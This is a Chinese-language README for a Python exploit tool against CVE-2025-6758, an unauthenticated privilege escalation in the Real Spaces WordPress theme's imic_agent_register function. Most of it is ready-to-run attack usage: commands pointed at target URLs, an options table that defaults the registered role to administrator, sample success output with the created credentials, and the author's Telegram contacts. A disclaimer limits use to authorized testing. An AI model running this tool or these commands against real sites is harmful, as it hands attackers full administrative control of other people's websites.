imic_agent_register 实现未认证权限提升至管理员CVE-2025-6758
CVSS 评分: 9.8(严重)
WordPress 的 Real Spaces - WordPress 物业目录主题 在所有版本(含 3.6)中,存在通过 imic_agent_register 函数进行权限提升的漏洞。
该漏洞源于注册过程中对角色分配的约束不足,允许未认证攻击者在注册新用户时任意指定其角色,包括 Administrator。
这一严重缺陷使远程攻击者能够获得运行存在漏洞主题的 WordPress 站点的完全管理员权限,危及受影响系统的完整性和安全性。
CVE-2025-6758.py 是一个用 Python 编写的专业漏洞利用与自动化脚本,用于演示和利用该漏洞。
该脚本专为渗透测试人员和安全研究人员设计,以高可靠、模块化和静默方式提供自动化发现、nonce 提取和利用功能。
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username 设置自定义用户名(默认:Nxploited)--password 设置自定义密码(默认:123456789)--email 设置自定义电子邮箱(默认:[email protected])--position 设置自定义职位(默认:Nxploitedadmin)--role 设置用户角色(默认:administrator)--max-pages 爬取 nonce 的最大页面数(默认:30)--max-depth 最大链接爬取深度(默认:2)--scan-common-paths 扫描额外的注册/插件/主题路径--ajax-path 自定义 AJAX POST 端点(默认:wp-admin/admin-ajax.php)--verify-ssl 启用 SSL 证书验证--cookie-save 保存会话 Cookie 的路径--save-json 将 nonce 发现结果保存为 JSON 的路径python3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
成功利用后,脚本将输出:
[+] 利用成功。
[+] 服务器消息:你已成功注册
[+] 用户名:Nxploited
[+] 密码:123456789
[+] 电子邮箱:[email protected]
如果利用失败或未找到 nonce,将显示描述性错误消息以及进一步的故障排除提示。
本脚本仅用于教育、研究和授权的渗透测试目的。
未经所有者明确书面许可,对网站或系统进行任何未经授权的使用均被严格禁止,并可能违法。
作者不对因使用本脚本而导致的任何误用或损害承担责任。
📧 邮箱: [email protected]
📨 Telegram: @Kxploit
📡 Telegram 频道: @KNxploited
作者:Nxploited ( Khaled Alenazi )
| 参数 | 默认值 | 描述 |
|---|
--username | Nxploited | 设置注册自定义用户名 |
--password | 123456789 | 设置注册自定义密码 |
--email | [email protected] | 设置自定义电子邮件地址 |
--position | Nxploitedadmin | 设置自定义职位值 |
--role | administrator | 设置注册角色(建议使用 administrator 以实现利用) |
--max-pages | 30 | 爬取 nonce 的最大页面数 |
--max-depth | 2 | 最大链接爬取深度 |
--scan-common-paths | 无 | 扫描额外的注册/插件/主题路径以获取 nonce(仅标志) |
--ajax-path | wp-admin/admin-ajax.php | 自定义 AJAX POST 端点 |
--verify-ssl | 无 | 启用 SSL 证书验证(仅标志) |
--cookie-save | 无 | 保存会话 Cookie 的路径(pickle 格式) |
--save-json | 无 | 将 nonce 发现结果保存为 JSON 的路径 |
--debug | 无 | 启用调试日志并打印 HTML/JS 片段(仅标志) |
--debug